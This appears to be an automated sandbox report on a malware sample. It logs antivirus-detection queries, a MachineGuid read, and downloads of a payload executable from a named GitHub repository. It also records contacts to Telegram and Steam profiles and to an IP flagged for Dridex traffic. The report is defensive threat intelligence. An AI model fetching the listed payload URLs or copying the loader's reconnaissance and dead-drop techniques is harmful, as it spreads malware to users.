Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00431442 GetUserNameA,

14_2_00431442

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
37.27.43.98	unknown	Iran (ISLAMIC Republic Of)	39232	UNINETAZ	false
20.233.83.145	github.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.199.110.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

Contacted Domains

Name	IP	Active
steamcommunity.com	104.102.49.254	true
github.com	20.233.83.145	true
raw.githubusercontent.com	185.199.110.133	true
t.me	149.154.167.99	true

Contacted URLs

Name	Malicious	Reputation
https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe	false	high
https://steamcommunity.com/profiles/76561199804377619	false	high
https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe	false	high
https://t.me/m3wm0w	false	high

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: YYjRtxS70h.exe	Virustotal: Detection: 62%			Perma Link
Source: YYjRtxS70h.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for dropped file

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YYjRtxS70h.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA,

14_2_0041FC3B

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

Source: YYjRtxS70h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,	14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA,	14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA,	14_2_0042498B

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

0_2_02832309

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 20.233.83.145 20.233.83.145

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 37.27.43.98:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 37.27.43.98:443

Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00418024 InternetReadFile,

14_2_00418024

Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;) equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;a( equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: t-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.1561429732.0000000007723000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.comd
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
